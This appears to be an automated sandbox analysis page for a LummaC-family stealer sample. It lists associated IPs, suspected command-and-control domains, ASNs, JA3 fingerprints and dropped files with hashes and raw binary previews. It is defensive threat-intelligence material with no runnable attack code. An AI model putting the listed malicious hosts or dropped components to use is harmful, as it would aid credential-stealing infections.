3.218.7.103	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
spuriotis.click	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
spuriotis.click	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
home.fortth14ht.top	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELCOM-ASRelcomGroup19022019RU	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	arm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	mips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	ppc.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	harm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	harm5.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	arm7.elf	Get hash	malicious	Unknown	Browse	194.87.30.79
	x86.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
CLOUDFLARENETUS	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
AMAZON-AESUS	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	54.225.146.64
	d8tp5flwzP.exe	Get hash	malicious	Metasploit	Browse	18.209.65.151
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	3.218.7.103
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.128.184
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.128.184
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.128.184

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\768400\Climb.com	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse
	installer.bat	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vUcZzNWkKc.exe.log

Download File

Process:	C:\Users\user\Desktop\vUcZzNWkKc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\768400\Climb.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: CLaYpUL3zw.exe, Detection: malicious, Browse Filename: BagsThroat.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: SoftWare(1).exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse Filename: JA7cOAGHym.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: FloydMounts.exe, Detection: malicious, Browse Filename: installer.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\768400\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	459790
Entropy (8bit):	7.999632331590964
Encrypted:	true
SSDEEP:	12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
MD5:	F9D71E9E58748BEEA3554073DCD205C8
SHA1:	0F059E563F46355BCA0866B3D7D0993DA4991C18
SHA-256:	45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
SHA-512:	BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\Alt

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	5.172930596796904
Encrypted:	false
SSDEEP:	768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
MD5:	BE1780E619FC600C90159E321A7BCBB9
SHA1:	C710D9B6E5843AD64355C032D4835707B245170E
SHA-256:	DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
SHA-512:	F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
Malicious:	false
Preview:	................................................................................................................................................................................................b........\... ... \|....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.\|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L

C:\Users\user\AppData\Local\Temp\Articles

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.968398681802287
Encrypted:	false
SSDEEP:	6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
MD5:	41B7CDB6E286EE0E44962C8987B91D3C
SHA1:	E57E0B12ABC823CB91D3ACFA32AD63230405057D
SHA-256:	43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
SHA-512:	B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
Malicious:	false
Preview:	cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..

C:\Users\user\AppData\Local\Temp\Attractions

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.686197497967684
Encrypted:	false
SSDEEP:	3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
MD5:	2ED9FFBA1FEA63AD6D178AEA296ED891
SHA1:	E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
SHA-256:	21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
SHA-512:	52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
Malicious:	false
Preview:	.U...........tB.E..M.}.G.}..H.E.;}.\|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F\|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F\|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....

C:\Users\user\AppData\Local\Temp\Beaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.997732291588885
Encrypted:	true
SSDEEP:	1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
MD5:	50CB864F887F934B80CC62A6BB08D611
SHA1:	C23F38262D04019CF198D4499DD95945FE078EC4
SHA-256:	B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
SHA-512:	9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
Malicious:	false
Preview:	.3.\|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.........Y.hTy4...n."....4..=T......A.{...b<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.\|\|.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.\|....~........\|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.

C:\Users\user\AppData\Local\Temp\Cooked

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	6.612657669946948
Encrypted:	false
SSDEEP:	1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
MD5:	A5CA22529355B052CBCCB045EC8172A1
SHA1:	12F5D5871B07A1EABB9B57753432FC59680830D2
SHA-256:	E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
SHA-512:	AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
Malicious:	false
Preview:	.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..\|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<M.u.h.)M........f9..,M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....\|$P..\|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...\|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E

C:\Users\user\AppData\Local\Temp\Enrolled

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	83982
Entropy (8bit):	7.99794941439563
Encrypted:	true
SSDEEP:	1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
MD5:	B0830E2CE03D5BC821D5136F5D8B4D5E
SHA1:	99840A43C60501C4F1F0151EE11798C7FA395591
SHA-256:	D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
SHA-512:	58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
Malicious:	false
Preview:	...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........\|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.\|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...\|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)

C:\Users\user\AppData\Local\Temp\Fingers

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	119633
Entropy (8bit):	6.0874087589267925
Encrypted:	false
SSDEEP:	1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	7D6337C50FA5EB0681D5B094E58E3541
SHA1:	BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
SHA-256:	791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
SHA-512:	A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
Malicious:	false
Preview:	.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F

C:\Users\user\AppData\Local\Temp\Maternity

Download File

Process:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997035686695416
Encrypted:	true
SSDEEP:	1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
MD5:	BF1A63801FCE643D91670984E50AA26C
SHA1:	96CC6E514ED73B0F0816884E6019F3F3C31F6A80
SHA-256:	96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
SHA-512:	D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
Malicious:	false
Preview:	.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..\|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......\|QT~dB..c..O..$.C...l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...

C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Download File

Process:	C:\Users\user\Desktop\vUcZzNWkKc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1062983
Entropy (8bit):	7.969270980145046
Encrypted:	false
SSDEEP:	12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
MD5:	A3E9A86D6EDE94C3C71D1F7EEA537766
SHA1:	DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
SHA-256:	A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
SHA-512:	AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pot

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	133120
Entropy (8bit):	6.593902201612224
Encrypted:	false
SSDEEP:	3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
MD5:	998B4B6FEEE76BEB9CA721DCD2B8A4E0
SHA1:	6556CA455B7F7B3B36F5A703746B17D2D662F82B
SHA-256:	A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
SHA-512:	A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
Malicious:	false
Preview:	.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..\|1...D1.t..@8.P..\|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..\|....T..t..R83.C.Z..\|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.\|$..y..v..I.......;.u.....2.....!............M..

C:\Users\user\AppData\Local\Temp\Promise

Download File

